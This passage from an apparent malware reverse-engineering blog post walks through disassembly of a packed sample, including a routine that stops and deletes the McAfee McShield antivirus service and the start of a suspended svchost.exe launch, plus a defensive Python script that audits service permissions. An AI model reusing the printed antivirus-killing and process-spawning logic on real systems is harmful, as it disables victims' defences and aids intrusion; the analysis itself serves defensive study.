As stated in my previous post, the call to search_process returns, and as EAX holds 0 the jump at 15161602 is taken and the search_proc_by_hash1 returns.
We proceed to search_proc_by_hash2:
UPX0:15161504 search_proc_by_hash2:
UPX0:15161504     push    process_name_hash2
UPX0:1516150A     call    search_process
UPX0:1516150F     or      eax, eax
UPX0:15161511     jz      locret_151615DD
...
UPX0:151615DD locret_151615DD:
UPX0:151615DD     retn
Once again search_process returns 0, so the jump is taken (and search_proc_by_hash2 returns as well).
Afterwards a call to disable_McShield takes place:
UPX0:15161133 disable_McShield proc near
UPX0:15161133     push    0F003Fh
UPX0:15161138     push    0
UPX0:1516113A     push    0
UPX0:1516113C     call    advapi_OpenSCManagerA
UPX0:15161142     or      eax, eax
UPX0:15161144     jz      short locret_15161197
UPX0:15161146     mov     ServiceControlManagerHandle, eax
UPX0:1516114B     push    0F01FFh
UPX0:15161150     push    offset aMcshield        ; "McShield"
UPX0:15161155     push    ServiceControlManagerHandle
UPX0:1516115B     call    advapi_OpenServiceA
UPX0:15161161     or      eax, eax
UPX0:15161163     jz      short loc_1516118B
UPX0:15161165     push    eax
UPX0:15161166     pop     dword_15163200
UPX0:1516116C     push    offset unk_15163204
UPX0:15161171     push    1
UPX0:15161173     push    dword_15163200
UPX0:15161179     call    advapi_ControlService
UPX0:1516117F     push    dword_15163200
UPX0:15161185     call    advapi_DeleteService
UPX0:1516118B loc_1516118B:
UPX0:1516118B     push    ServiceControlManagerHandle
UPX0:15161191     call    advapi_CloseServiceHandle
UPX0:15161197 locret_15161197:
UPX0:15161197     retn
UPX0:15161197 disable_McShield endp
First, let's look at what OpenSCManagerA does.
From http://msdn.microsoft.com/en-us/library/ms684323(VS.85).aspx we can see that OpenSCManagerA
"Establishes a connection to the service control manager on the specified computer and opens the specified service control manager database."
And what is this service control manager? Again from MSDN (http://msdn.microsoft.com/en-us/library/ms685150(VS.85).aspx):
"
The service control manager (SCM) is started at system boot. It is a remote procedure call (RPC) server, so that service configuration and service control programs can manipulate services on remote machines.
The service functions provide an interface for the following tasks performed by the SCM:
* Maintaining the database of installed services.
* Starting services and driver services either upon system startup or upon demand.
* Enumerating installed services and driver services.
* Maintaining status information for running services and driver services.
* Transmitting control requests to running services.
* Locking and unlocking the service database.
"
The function then tries to open a service named "McShield" (which in my case failed). If the service exists, it first sends it a control request through ControlService (the control code pushed is 1, i.e. a stop request) and then calls DeleteService, which marks the service for deletion from the service database.
The handles are then closed and the function returns.
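The two access masks the sample pushes (0F003Fh for OpenSCManagerA and 0F01FFh for OpenServiceA) are just bit combinations of the SCM and service rights; decoding them shows how much the function asks for, and the same right bits appear in the service's security descriptor, which is what actually decides who can stop or delete it. The script below is an added example, not code from the post: it decodes both masks, parses the DACL of a service SDDL string (the format `sc.exe sdshow` prints), and flags allow ACEs that give anyone other than SYSTEM or Administrators the rights needed to do what disable_McShield does. The SDDL samples are constructed; `query_service_sddl` is a hypothetical helper that shells out to `sc.exe` and only works on Windows, and the trusted-principal set and the "disabling" rights selection are this example's own assumptions.

```python
import re
import subprocess
import sys
from typing import Dict, List, NamedTuple

# Service-specific access bits (winsvc.h) plus the standard rights they combine with.
# SERVICE_ALL_ACCESS = 0xF01FF is the value pushed before OpenServiceA in the listing.
SERVICE_RIGHTS: Dict[int, str] = {
    0x0001: "SERVICE_QUERY_CONFIG", 0x0002: "SERVICE_CHANGE_CONFIG",
    0x0004: "SERVICE_QUERY_STATUS", 0x0008: "SERVICE_ENUMERATE_DEPENDENTS",
    0x0010: "SERVICE_START", 0x0020: "SERVICE_STOP",
    0x0040: "SERVICE_PAUSE_CONTINUE", 0x0080: "SERVICE_INTERROGATE",
    0x0100: "SERVICE_USER_DEFINED_CONTROL",
    0x00010000: "DELETE", 0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC", 0x00080000: "WRITE_OWNER",
}

# SCM access bits; SC_MANAGER_ALL_ACCESS = 0xF003F is pushed before OpenSCManagerA.
SCM_RIGHTS: Dict[int, str] = {
    0x0001: "SC_MANAGER_CONNECT", 0x0002: "SC_MANAGER_CREATE_SERVICE",
    0x0004: "SC_MANAGER_ENUMERATE_SERVICE", 0x0008: "SC_MANAGER_LOCK",
    0x0010: "SC_MANAGER_QUERY_LOCK_STATUS", 0x0020: "SC_MANAGER_MODIFY_BOOT_CONFIG",
    0x00010000: "DELETE", 0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC", 0x00080000: "WRITE_OWNER",
}

def decode_mask(mask: int, table: Dict[int, str]) -> List[str]:
    """Return the named rights set in an access mask, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if mask & bit]

# Two-letter SDDL right codes as they appear in `sc sdshow` output for a service object.
SDDL_SERVICE_CODES: Dict[str, int] = {
    "CC": 0x0001, "DC": 0x0002, "LC": 0x0004, "SW": 0x0008, "RP": 0x0010,
    "WP": 0x0020, "DT": 0x0040, "LO": 0x0080, "CR": 0x0100,
    "SD": 0x00010000, "RC": 0x00020000, "WD": 0x00040000, "WO": 0x00080000,
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
}

class Ace(NamedTuple):
    ace_type: str   # "A" = access allowed, "D" = access denied
    mask: int       # decoded access mask
    sid: str        # SDDL SID alias (SY, BA, IU, AU, ...) or an S-1-... string

# (type;flags;rights;object_guid;inherit_guid;sid)
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")

def parse_service_dacl(sddl: str) -> List[Ace]:
    """Parse the DACL ('D:' component) of a service SDDL string into ACEs."""
    start = sddl.find("D:")
    if start < 0:
        return []
    end = sddl.find("S:", start + 2)          # the SACL, if present, follows the DACL
    dacl = sddl[start + 2 : end if end >= 0 else len(sddl)]
    aces = []
    for m in ACE_RE.finditer(dacl):
        ace_type, _flags, rights, _otype, _itype, sid = m.groups()
        if rights.lower().startswith("0x"):   # SDDL may carry a raw hex mask instead of codes
            mask = int(rights, 16)
        else:
            mask = 0
            for i in range(0, len(rights), 2):
                mask |= SDDL_SERVICE_CODES.get(rights[i:i + 2].upper(), 0)
        aces.append(Ace(ace_type, mask, sid))
    return aces

# Rights that let a principal do what disable_McShield does (stop, delete, reconfigure,
# or rewrite the security descriptor). Assumption of this example, not a Windows constant.
DISABLING_MASK = 0x0020 | 0x00010000 | 0x0002 | 0x00040000 | 0x00080000 | 0x10000000
TRUSTED_SIDS = {"SY", "BA"}   # LocalSystem and BUILTIN\Administrators

def risky_aces(sddl: str) -> List[Ace]:
    """Allow ACEs that give a non-trusted principal stop/delete/reconfigure rights."""
    return [a for a in parse_service_dacl(sddl)
            if a.ace_type == "A" and a.sid not in TRUSTED_SIDS and a.mask & DISABLING_MASK]

def query_service_sddl(service_name: str) -> str:
    """Hypothetical helper: read a service's SDDL with `sc.exe sdshow` (Windows only)."""
    if not sys.platform.startswith("win"):
        raise OSError("sc.exe is only available on Windows")
    out = subprocess.run(["sc.exe", "sdshow", service_name],
                         capture_output=True, text=True, check=True)
    return out.stdout.strip()

# Constructed samples: a default-looking service DACL, and the same DACL with an extra
# ACE that hands Authenticated Users (AU) the stop (WP) and delete (SD) rights.
SAMPLE_DEFAULT = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                  "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)")
SAMPLE_WEAK = SAMPLE_DEFAULT + "(A;;CCLCSWRPWPDTLOCRRCSD;;;AU)"

if __name__ == "__main__":
    print("OpenSCManagerA 0xF003F ->", decode_mask(0xF003F, SCM_RIGHTS))
    print("OpenServiceA   0xF01FF ->", decode_mask(0xF01FF, SERVICE_RIGHTS))
    name = sys.argv[1] if len(sys.argv) > 1 else None
    sddl = query_service_sddl(name) if name else SAMPLE_WEAK
    for ace in risky_aces(sddl):
        print(f"WARNING: {ace.sid} may stop/delete the service:",
              decode_mask(ace.mask, SERVICE_RIGHTS))
```

Run without arguments it audits the constructed weak DACL; on Windows, `python audit.py McShield` reads the live descriptor instead. Note that a clean DACL only limits unprivileged callers: the sample requests all-access handles, so it succeeds whenever it already runs as an administrator, which is why the check belongs next to privilege hygiene rather than in place of it.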
After the call to disable_McShield there is a call to GetModuleFileNameA, which returns the full path name of the executable file. That string is appended to "svchost.exe", and a process is created with its command line set to "svchost.exe " followed by that string and with the creation flags set to CREATE_SUSPENDED. A handle to our own module is then retrieved through the call at 15161B1C to GetModuleHandleA (since 0 is passed as its argument).